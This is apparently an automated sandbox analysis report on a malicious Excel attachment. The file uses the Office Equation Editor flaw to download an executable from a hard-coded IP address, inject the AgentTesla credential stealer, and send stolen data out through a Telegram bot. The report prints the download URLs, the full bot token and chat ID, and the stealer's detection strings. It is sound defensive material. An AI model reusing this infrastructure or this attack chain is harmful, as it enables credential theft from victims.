
Windows Analysis Report
Bank TT slip.xlsx

Overview

General Information

Sample Name:Bank TT slip.xlsx
Analysis ID:626166
MD5:2391e6aa319cba9248661674ac5f2105
SHA1:bbdb700fd74488cc9f3f3e4d66de6b1321ee94b0
SHA256:18fa3e8547f1b76b8a53b1169c4b3ed78f1a3efb77163e0698ae3b1faf7efb71

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Shellcode detected
Yara detected Generic Downloader
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 792 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 1488 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2404 cmdline: "C:\Users\Public\vbc.exe" MD5: F18604D5FC3E2930E85C403E0E80A459)
      • RegSvcs.exe (PID: 1452 cmdline: {path} MD5: 62CE5EF995FD63A1847A196C2E8B267B)
  • cleanup
{"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "1295185895", "Chat URL": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument"}
Source | Rule | Description | Author | Strings
00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
5.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
5.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
5.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
5.2.RegSvcs.exe.400000.0.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
  • 0x30dcf:$s1: get_kbok
  • 0x3172a:$s2: get_CHoo
  • 0x3239d:$s3: set_passwordIsSet
  • 0x30bd3:$s4: get_enableLog
  • 0x35378:$s8: torbrowser
  • 0x33d54:$s10: logins
  • 0x33629:$s11: credential
  • 0x2ffb6:$g1: get_Clipboard
  • 0x2ffc4:$g2: get_Keyboard
  • 0x2ffd1:$g3: get_Password
  • 0x315d8:$g4: get_CtrlKeyDown
  • 0x315e8:$g5: get_ShiftKeyDown
  • 0x315f9:$g6: get_AltKeyDown
5.0.RegSvcs.exe.400000.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

                    Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 172.245.27.27, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1488, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1488, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe
                    No Snort rule has matched


                    AV Detection

Source: 5.0.RegSvcs.exe.400000.4.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1295185895", "Chat URL": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument"}
Source: vbc.exe.2404.4.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}
Source: Bank TT slip.xlsx | Metadefender: Detection: 20%
Source: Bank TT slip.xlsx | ReversingLabs: Detection: 31%
Source: http://172.245.27.27/SOA.exe | Avira URL Cloud: Label: malware
Source: Http://172.245.27.27/SOA.exeK | Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exeX | Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exehhC: | Avira URL Cloud: Label: malware
Source: Http://172.245.27.27/SOA.exej | Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exeB | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe | ReversingLabs: Detection: 46%
Source: C:\Users\Public\vbc.exe | ReversingLabs: Detection: 46%
Source: C:\Users\Public\vbc.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe | Joe Sandbox ML: detected
Source: 5.0.RegSvcs.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.1.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.2.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.3.unpack | Avira: Label: TR/Spy.Gen8

                    Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 172.245.27.27 Port: 80
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

                    Software Vulnerabilities

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03680658 ShellExecuteExW,ExitProcess,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03680592 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036804ED ExitProcess,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03680676 ExitProcess,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03680641 ShellExecuteExW,ExitProcess,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036805AC URLDownloadToFileW,ShellExecuteExW,ExitProcess,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03680522 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_03680506 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
Source: global traffic | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 172.245.27.27:80
Source: excel.exe | Memory has grown: Private usage: 4MB later: 60MB

                    Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View | IP Address: 172.245.27.27
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Fri, 13 May 2022 14:58:18 GMT | Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.28 | Last-Modified: Thu, 12 May 2022 04:27:00 GMT | ETag: "cb600-5dec8f8138359" | Accept-Ranges: bytes | Content-Length: 833024 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
Source: global traffic | HTTP traffic detected: GET /SOA.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 172.245.27.27 | Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
Source: unknown | TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Http://172.245.27.27/SOA.exeK
Source: EQNEDT32.EXE, 00000002.00000002.962678277.0000000003680000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Http://172.245.27.27/SOA.exej
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: EQNEDT32.EXE, 00000002.00000002.962279454.0000000000320000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.27.27/SOA.exe
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.27.27/SOA.exeB
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.27.27/SOA.exeX
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://172.245.27.27/SOA.exehhC:
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bLHfhV.com
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocumentdocument-----
Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18D80E7.png
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
Source: global traffic | HTTP traffic detected: GET /SOA.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 172.245.27.27 | Connection: Keep-Alive

                    Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File written: C:\Windows\System32\drivers\etc\hosts

                    System Summary

Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
Source: 5.0.RegSvcs.exe.400000.4.unpack, <PrivateImplementationDetails>{2F5ED5A7-845C-44F8-B96B-10B79141A2A8}/318549B0-EE33-4898-AEAE-1AF000D2687D.cs | Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.1.unpack, <PrivateImplementationDetails>{2F5ED5A7-845C-44F8-B96B-10B79141A2A8}/318549B0-EE33-4898-AEAE-1AF000D2687D.cs | Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.2.unpack, <PrivateImplementationDetails>{2F5ED5A7-845C-44F8-B96B-10B79141A2A8}/318549B0-EE33-4898-AEAE-1AF000D2687D.cs | Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.0.unpack, <PrivateImplementationDetails>{2F5ED5A7-845C-44F8-B96B-10B79141A2A8}/318549B0-EE33-4898-AEAE-1AF000D2687D.cs | Large array initialization: .cctor: array initializer size 12054
Source: 5.2.RegSvcs.exe.400000.0.unpack, <PrivateImplementationDetails>{2F5ED5A7-845C-44F8-B96B-10B79141A2A8}/318549B0-EE33-4898-AEAE-1AF000D2687D.cs | Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.3.unpack, <PrivateImplementationDetails>{2F5ED5A7-845C-44F8-B96B-10B79141A2A8}/318549B0-EE33-4898-AEAE-1AF000D2687D.cs | Large array initialization: .cctor: array initializer size 12054
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EB070
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EA8F8
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9910
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EC970
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EF14E
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EBA80
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5440
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E8740
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002ED808
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EC959
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EF222
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9A04
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EEA69
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EEA78
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9AB3
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E9A98
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EE420
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5430
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EE410
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EECA2
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EECB0
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EEF4A
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002EEF58
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002ED7F9
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C64DF
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C8DDD
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C3EF0
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C43BF
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C0048
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C3010
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C6D78
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C4D79
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C6134
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C6D91
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C4D88
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C6E1A
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C3610
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C6B78
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C6771
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_007C7751
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E178A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00286048
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00285430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00282198
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00285778
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe 46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
                    Source: Joe Sandbox ViewDropped File: C:\Users\Public\vbc.exe 46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
                    Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and write
                    Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 77620000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: 77740000 page execute and read and write
                    Source: Bank TT slip.xlsxMetadefender: Detection: 20%
                    Source: Bank TT slip.xlsxReversingLabs: Detection: 31%
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
                    Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Bank TT slip.xlsx
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR66EC.tmp
                    Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winXLSX@6/18@1/1
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
                    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\JHFJngVRuKk
                    Source: 5.0.RegSvcs.exe.400000.4.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.0.RegSvcs.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
